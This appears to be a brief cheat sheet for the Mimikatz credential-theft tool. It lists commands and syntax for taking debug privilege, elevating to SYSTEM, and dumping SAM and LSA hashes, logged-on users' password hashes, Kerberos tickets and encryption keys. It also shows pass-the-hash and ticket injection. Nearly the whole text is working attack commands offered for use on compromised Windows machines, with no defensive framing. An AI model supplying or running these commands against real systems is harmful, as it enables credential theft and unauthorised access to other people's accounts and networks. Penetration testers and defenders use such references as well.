Mimikatz is a tool for dumping and using cached credentials on a compromised machine. High integrity or SYSTEM privileges required for most commands.
Usage
Acquiring Privilege
privilege::debug(try to enable SeDebugPrivilege; needed for elevation)token::elevate(try to elevate from high integrity to SYSTEM, if not already)
Dumping Credentials
lsadump::sam(dump cached NTLM hashes from LSASS; local users only)lsadump::lsa [/patch](dump LSA hashes; use/patchto try and fix errors)sekurlsa::logonpasswords(dump all logged on users’ password hash, including remote users’)sekurlsa::msv(dumps local and domain user cached hashes)kerberos::list /export(dump Kerberos tickets)sekurlsa::tickets /export(dump cached tickets; in the output, “TGT” means ticket-granting ticket, “TGS” means ticket-granting service-ticket)sekurlsa::ekeys(dumps cached encryption keys for Kerberos authentication; debug required)
Using Credentials
sekurlsa::pth(pass-the-hash)- Format:
sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND - Run with unelevated privileges (use
token::revert). pass-the-hash with an elevated token does not work.
- Format:
kerberos::ptt TICKET.kirbi(inject ticket into memory; elevated privilege not necessary)
Miscellaneous
kerberos::purge(get rid of tickets in the current session)